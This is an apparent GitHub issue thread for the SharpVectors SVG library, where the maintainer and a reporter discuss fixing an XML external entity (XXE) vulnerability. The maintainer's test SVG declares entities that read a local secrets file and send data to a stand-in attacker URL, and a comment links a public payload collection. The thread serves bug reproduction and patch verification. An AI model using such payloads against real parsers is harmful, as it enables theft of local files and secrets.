Comments (4)
@MarvinPogoda Sorry, there will be a little delay in the packaging. I have started implementing fix for the XXE vulnerability, which will cover other external/local URL in the SVG document (per user-settings).
The default maintains the DtdProcessing.Parse settings, but only resolved DTD in resource to maintain the validation of SVG documents.
The test SVG is shown below. Hope you can verify this commit with your documents and provide feedback.
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"[
<!ENTITY xxe SYSTEM "file:///local/path/to/secrets.txt">
<!ENTITY exfil SYSTEM 'http://attackerurl.com/?x=%file;'>
<!ENTITY xeimage SYSTEM 'https://dev.w3.org/SVG/tools/svgweb/samples/svg-files/410.svg'>
<!ENTITY st0 "fill:#BF0D0B;stroke-width:5;">
<!ENTITY st1 "fill:#F8E81F;stroke-width:5;">
<!ENTITY st2 "fill:#F7B71B;stroke-width:5;">
<!ENTITY st3 "fill-rule:nonzero;clip-rule:nonzero;stroke:#000000;stroke-miterlimit:4;">
<!ENTITY st4 "fill:#C5E41E;stroke-width:5;"> ]>
<svg width="422.5pt" height="425pt" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<g id="group1" style="&st3;">
<path style="&st0;" d="M122.5,61.25c0,32.447-26.863,58.75-60,58.75s-60-26.303-60-58.75S29.363,2.5,62.5,2.5s60,26.303,60,58.75z" />
<path style="&st2;" d="M170,103.75c0,33.828-27.982,61.25-62.5,61.25S45,137.578,45,103.75S72.982,42.5,107.5,42.5S170,69.922,170,103.75z" />
<path style="&st1;" d="M282.5,190c0,49.706-37.496,90-83.75,90S115, 239.706,115,190s37.496-90,83.75-90s83.75,40.294,83.75,90z" />
<path style="&st4;" d="M420,316.25c0,58.681-50.368,106.25-112.5,106.25S195,374.931,195,316.25C195,257.57,245.368,210,307.5,210S420,257.57,420,316.25z" />
</g>
<text id="secret1" font-size="16" x="0" y="16">&xxe;</text>
<text id="secret2" font-size="48pt" x="32" y="220">Hello, XXE</text>
<image x="90" y="180" width="128" height="146" xlink:href="https://dev.w3.org/SVG/tools/svgweb/samples/svg-files/410.svg"/>
</svg>
from sharpvectors.
Hey @paulushub ,
thank you for looking into the issue.
I discovered the vulnerability by accident and I'm by far no expert in DTD-Parsing or XXE-attacks. Since there are other attack-vectors with dtd-parsing, I'm not even sure of blocking external resources will resolve the vulnerability completly.
Since this is an urgent issue for projects with high security standards, could it be possible to get a package version with the changes made in #264, so we can completly turn dtd-parsing off?
from sharpvectors.
Since there are other attack-vectors with dtd-parsing
For SVG, the URL resolution is the only use case I have found so far.
I understand your needs and working to address it as soon as possible, while resolving it for others by default and without breaking their codes. Sorry for the inconvenience. It should be ready by Monday.
For the SVG file, the URL being resolved can be from several sources (DTD, element, image, CSS, font, etc.), DTD is just one of them.
Currently, the only schema provided by SVG specification is DTD, and it is the only means to validate the SVG document.
The schema file is packaged as resource in the DLL (no external access, file/http, is required), so even in this default settings I have made it possible to avoid this issue, for those who may not turn DTD parsing off, as well as making it possible to satisfy your case of manually turning it off.
And also, provide the means to turn other URL sources off (or control it).
I am trying to provide the means to finely control it depending on your requirements (image for instance, restricting access to local/file URL sources only).
I think I have completed the research on this and working to complete the implementation.
from sharpvectors.
You visit the SVG section of the GitHub: XXE Injection or link below to see same examples of this attack:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md#xxe-inside-svg
from sharpvectors.
Related Issues (20)
- Change svgImage source on mouseOver? HOT 1
- SvgViewbox can not open this Uri(https://baikebcs.bdimg.com/cms/static/baike-icon.svg) HOT 4
- WpfDrawingSettings PixelWidth PixelHeight Have no effect HOT 3
- The opacity of property of SVG not correct. HOT 5
- Svg file is different with other browser. HOT 6
- `AppName` case style may determine whether show svg image or not HOT 1
- SharpVectors release schedule? HOT 1
- Rendering issue with elements outside the canvas HOT 3
- Target framework issue when used in .NET 4.7.2. project HOT 3
- NOTE: Dropping Support for .NET 5
- The svg image is cropped
- Not Support the extra commas in SVG elements HOT 4
- The Svg file not render correct on .net7 windows platform.
- Release New version schedule? HOT 1
- EnsureViewboxSize of WpfDrawingSettings not work when svg has viewbox. HOT 2
- Size of drawinggroup is not correct in 1.83 HOT 9
- MIT license text may be incorrect HOT 6
- Bad text display
- Corrupted rendering of Verovio SVG output HOT 3
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from sharpvectors.